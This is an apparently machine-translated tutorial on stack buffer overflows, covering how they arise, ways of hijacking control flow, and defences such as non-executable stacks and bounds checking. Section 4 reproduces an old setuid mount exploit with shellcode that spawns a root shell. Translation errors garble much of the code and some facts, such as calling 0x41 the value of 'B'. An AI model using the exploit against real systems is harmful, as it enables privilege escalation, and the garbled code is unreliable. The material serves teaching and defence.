In the past decade, the most common form of security vulnerabilities is buffer overflow. More seriously, the buffer overflow vulnerability accounts for the vast majority of remote network attacks. Such attacks allow an anonymous Internet user to gain some or all control of a host! This type of attack makes it possible for anyone to gain control of the host, so it represents an extremely serious security threat.
Buffer overflow attacks become a common attack because the buffer overflow vulnerability is too common and easy to implement. In addition, buffer overflow becomes the main means of remote attacks because the buffer overflow vulnerability gives attackers everything they want: to generate and execute attack code. The attacked code runs programs with buffer overflow vulnerabilities with certain permissions to gain control of the attacked host. This article briefly introduces the basic principles and prevention methods of buffer overflow.
I. concept and principle of Buffer Overflow
The buffer zone is the place where data is stored in the memory. When a program tries to place data in a certain location in the machine memory, a buffer overflow occurs because there is not enough space. Human overflow is a certain attempt. Attackers write a string that exceeds the buffer length, implant it into the buffer zone, and then insert a long string into the buffer zone of a limited space, at this time, two results may occur: first, a long string overwrites the adjacent storage unit, causing program running to fail, and severe system crashes; another result is that attackers can execute arbitrary commands and even obtain the system root privilege.
A buffer is a continuous block in the machine memory when the program is running. It stores the given type of data, and problems may occur with the dynamic allocation of variables. To avoid occupying too much memory, a program with dynamic Variable Allocation decides how much memory to allocate to them only when running the program. If the program puts too much data in the dynamically allocated buffer, it will overflow. A buffer overflow program uses this overflow data to put the assembly language code into the machine's memory, usually where the root permission is generated. A single buffer overflow is not the root cause. However, if the commands are exceeded to a region where the commands can be run with root permissions, once these commands are run, the machine will be overwhelmed.
The cause of buffer overflow is that the program does not carefully check user input parameters. For example, the following program:
Example1.c
Void func1 (char * input ){
Char buffer [16];
Strcpy (buffer, input );
}
The strcpy () above directly copies the content in the input to the buffer. In this way, as long as the input length is greater than 16, it will cause buffer overflow and cause program running errors. Standard Functions with problems such as strcpy include strcat (), sprintf (), vsprintf (), gets (), scanf (), and GETC () in the loop (), fgetc (), getchar (), etc.
Of course, if you enter anything in the buffer zone, it will only cause the segmentation fault error, rather than attack. The most common method is to run a User Shell by creating a buffer overflow, and then execute other commands through shell. If the program is root and has SUID permissions, attackers can obtain a shell with root permissions and perform arbitrary operations on the system.
Note that, unless otherwise specified, the following content assumes that the user's platform is an intel X86 CPU-based Linux system. For other platforms, the concept in this article also applies, but the program must be modified accordingly.
Ii. Manufacturing Buffer Overflow
A program is generally divided into program segments, data segments, and stacks in the memory. The program segment contains the program's machine code and read-only data. The data segment contains static data in the program. Dynamic data is stored through stacks. In memory, their locations are:
When a function is called in a program, the computer first presses the parameter into the stack, and then saves the content in the instruction register (IP) as the return address (RET ); the third place in the stack is the base address register (FP). Then, the current stack pointer (SP) is copied to the FP as the new base address. Finally, some space is reserved for the local variable, subtract the appropriate value from the SP. The following program is used as an example:
Example2.c
Void func1 (char * input ){
Char buffer [16];
Strcpy (buffer, input );
}
Void main (){
Char longstring [256];
Int I;
For (I = 0; I <255; I ++)
Longstring = 'B ';
Func1 (longstring );
}
When the function func1 () is called, the stack is as follows:
Needless to say, the program execution result is "segmentation fault (core dumped)" or similar error information. Because the first 256 bytes starting from the buffer will be overwritten by * input content 'B', including SFP, RET, and even * input. The hexadecimal value of 'B' is 0x41, so the return address of the function is 0x41414141, which exceeds the address space of the program, so a segment error occurs.
Iii. Buffer overflow vulnerability attack methods
The buffer overflow vulnerability allows any hacker to gain control of the machine or even the highest privilege. Generally, the buffer overflow vulnerability is used to attack the root program. Most of them obtain the root shell by executing code similar to "Exec (SH. To achieve the goal, hackers usually need to complete two tasks, that is, arrange the appropriate code in the program's address space and let the program jump to the arranged address space for execution through the appropriate initialization register and memory.
1. arrange proper code in the address space of the program
It is usually relatively simple to arrange proper code in the address space of the program. If the code to be attacked already exists in the attacked program, you can simply pass some parameters to the code and redirect the program to the target. The attack code must execute "Exec ('/bin/Sh')", while the code in the libc library must execute "Exec (ARG )", "Arg" is a pointer parameter pointing to a string. You only need to modify the passed parameter pointer to "/bin/sh ", then jump to the response command sequence in the libc library. Of course, most of the time this possibility is very small, so we have to do it in a way called "implantation. When a string is input to the program to be attacked, the program will put the string in the buffer zone, the data contained in this string is a sequence of commands that can be run on the target hardware platform. The buffer can be located anywhere in the stack (automatic variable), heap (dynamically allocated), and static data zone (initialized or uninitialized data. You do not have to overflow any buffer for this purpose. You only need to find enough space to place these Attack codes.
2. Transfer the control program to the form of attack code
Buffer Overflow Vulnerability attacks are all seeking to change the execution process of the program and redirect it to the attack code. The most basic thing is to overflow a buffer with no check or other vulnerabilities, this will disrupt the normal execution order of the program. By overflowing a buffer, you can rewrite the space of similar programs and directly jump to the system to authenticate the identity. In principle, the buffer overflow program space for the attack can be any space. However, the positioning of different locations is different, so there are multiple transfer methods.
(1) function pointers (function pointer)
In the program, "void (* Foo) ()" declares a variable "foo" whose return value is "Void" function pointers ". Function pointers can be used to locate any address space. During the attack, you only need to find a buffer zone that can overflow in the function pointers adjacent to any space, and then use overflow to change function pointers. When a program calls a function through function pointers, the process of the program is implemented.
(2) activation records (activation record)
When a function call occurs, an activation records record is stored in the stack, which contains the address returned when the function ends. Execute the overflow automatic variables to point the returned address to the attack code, and then change the return address of the program. When the function call ends, the program jumps to the preset address instead of the original address. Such overflow methods are also common.
(3) longjmp buffers (Long Jump buffer)
The C language contains a simple test/recovery system called "setjmp/longjmp", which means to set "setjmp (buffer)" at the test point and use longjmp (buffer) "To restore the checkpoint. If you can enter the buffer space during the attack, you will feel that "longjmp (buffer)" is actually a jump to the attack code. Like function pointers, The longjmp buffer can point anywhere, so finding a buffer for overflow is the first thing to do.
3. embedded integrated code and Process Control
The common overflow buffer attack class integrates code implantation and activation records in a string. During the attack, the system locates in an automatic variable that can overflow, and then transmits a large string to the program, code can be embedded when a buffer overflow changes activation records (permission C only opens a small buffer for users and parameters ). Inserting code and buffer overflow do not have to be completed at one time. You can place the code in a buffer zone (this does not overflow the buffer zone), and then transfer the pointer of the program by overflow of another buffer zone. This method is generally used when the buffer for overflow cannot be put into all code. If you want to use a resident code without external implantation, you must first use the code as a parameter. Some code segments in libc (friends familiar with C should know that almost all C program connections are connected using it now) will execute "Exec (something )", when something is a parameter, it uses buffer overflow to change the program parameters, and then uses another buffer overflow to point the program pointer to a specific code segment in libc.
Network security caused by program writing errors should also be paid attention to, because its unsecure nature has been fully reflected by buffer overflow.
4. system attacks using Buffer Overflow
If we know that a program has a buffer overflow defect, how can we know the buffer address and where can we put the shell code? Since the stack start address of each program is fixed, we can theoretically obtain it by repeatedly retrying the distance between the buffer and the stack start position. However, this blind guess may take hundreds to thousands of times, which is actually unrealistic. The solution is to use the NULL command NOP. Put a long string of Nop in front of the shell code, and the return address can point to any location in the string of Nop. After the NOP command is executed, the program will activate the shell process. This greatly increases the possibility of guessing. The following is an example of a buffer overflow attack, which exploits the system program Mount vulnerability:
Example5.c
/* Mount exploit for Linux, Jul 30 1996
Discovered and coded by bloodmask & vio
Covin security 1996
*/
# Include
# Include
# Include
# Include
# Include
# Define path_mount "/bin/umount"
# Define buffer_size 1024
# Define default_offset 50
U_long get_esp ()
{
_ ASM _ ("movl % ESP, % eax ");
}
Main (INT argc, char ** argv)
{
U_char execshell [] =
"/Xeb/x24/x5e/x8d/x1e/x89/x5e/x0b/x33/xd2/x89/x56/x07/x89/x56/x0f"
"/Xb8/x1b/x56/x34/X12/x35/x10/x56/x34/X12/x8d/x4e/x0b/x8b/XD1/XCD"
"/X80/x33/xc0/X40/XCD/X80/xe8/xd7/xFF/bin/sh ";
Char * buff = NULL;
Unsigned long * addr_ptr = NULL;
Char * PTR = NULL;
Int I;
Int OFS = default_offset;
Buff = malloc (4096 );
If (! Buff)
{
Printf ("can't allocate memory/N ");
Exit (0 );
}
PTR = Buff;
/* Fill start of buffer with NOPs */
Memset (PTR, 0x90, BUFFER_SIZE-strlen (execshell ));
PTR + = BUFFER_SIZE-strlen (execshell );
/* Stick ASM code into the buffer */
For (I = 0; I <strlen (execshell); I ++)
* (PTR ++) = execshell;
Addr_ptr = (long *) PTR;
For (I = 0; I <(8/4); I ++)
* (Addr_ptr ++) = get_esp () + OFS;
PTR = (char *) addr_ptr;
* PTR = 0;
(Void) Alarm (u_int) 0 );
Printf ("discovered and coded by bloodmask and VIO, covin 1996/N ");
Execl (path_mount, "Mount", buff, null );
}
The get_esp () function in the program is used to locate the stack location. The program first allocates a temporary buff, then fills up NOP in the front of the buff, and then puts shell code in the later part. The last part is the address to be returned by the program, which is obtained by adding an offset to the stack address. When the mount program is called with buff as the parameter, the stack of the mount program will overflow, its buffer will be overwritten by the buff, and the return address will point to the NOP command.
Because the owner of the mount program is root and has a SUID, normal users will get a shell with root permission when running the above program.
5. protection methods for Buffer Overflow
Currently, there are four basic methods to protect the buffer zone from the attacks and impacts of buffer overflow:
1. How to force correct code writing
Writing the correct code is a very meaningful but time-consuming task, especially a program that is prone to errors (such as the zero-end character string) written in C language ), this style is caused by the pursuit of performance and ignoring the correctness of the tradition. Although it took a long time to let people know how to write security programs, security vulnerabilities still emerge. Therefore, some tools and technologies have been developed to help experienced programmers write secure and correct programs. Although these tools help programmers develop safer programs, due to the characteristics of the C language, these tools cannot find all buffer overflow vulnerabilities. Therefore, the error detection technology can only be used to reduce the possibility of buffer overflow, and cannot completely eliminate its existence. Unless the programmer can ensure that his program is safe, the following content should be used to ensure the reliability of the program.
2. The buffer zone cannot be executed through the operating system, thus preventing attackers from launching attack code.
This method effectively prevents many buffer overflow attacks, but the attacker does not have to generate attack code to realize the buffer overflow attack. Therefore, this method still has many weaknesses.
3. Use the boundary check of the compiler to implement buffer Protection
This method makes Buffer Overflow impossible, completely eliminating the threat of buffer overflow, but the cost is relatively high.
4. Check the integrity before the program pointer fails.
In this way, although this method cannot invalidate all buffer overflow, it does prevent the vast majority of buffer overflow attacks, and it is difficult to achieve the buffer overflow that can escape the protection of this method.
The most common form of buffer overflow is attack activity records and code is added to the stack. This type of attack has many records in 1996. Instead of implementing stack and stack protection, this attack can be effectively defended. Non-execution stacks can defend against all attack methods that generate code into the stack, and stack protection can defend against all methods that change activity records. These two methods are compatible with each other and can defend against multiple possible attacks at the same time.
The rest of the attacks can basically be defended using pointer protection, but manual protection is required in some special cases. Fully automatic pointer protection requires adding additional bytes to each variable, which makes the pointer boundary check advantageous in some cases.
The most interesting thing is that the buffer overflow vulnerability-the Morris worm uses today's methods that cannot be effectively defended, but it is rarely used because it is too complex.
In this article, we describe and analyze the principle of buffer overflow in detail, and briefly introduce several defense methods. As this attack is a common attack method, it is meaningful and effective to conduct research in this area.
References
[1] network intrusion detection analyst manual. Translated by Stephen Northcutt, Yu Qingyi, et al.. People's post and telecommunications press, 2000.3
[2] Analysis of C language problems. Edited by Yan Guilan and Liu Jia Yao. China East Engineering College Press, 1993,1.
[3] technical guidelines for cybersecurity. Translated by Wang Rui, published by China Machinery Industry Press, 5.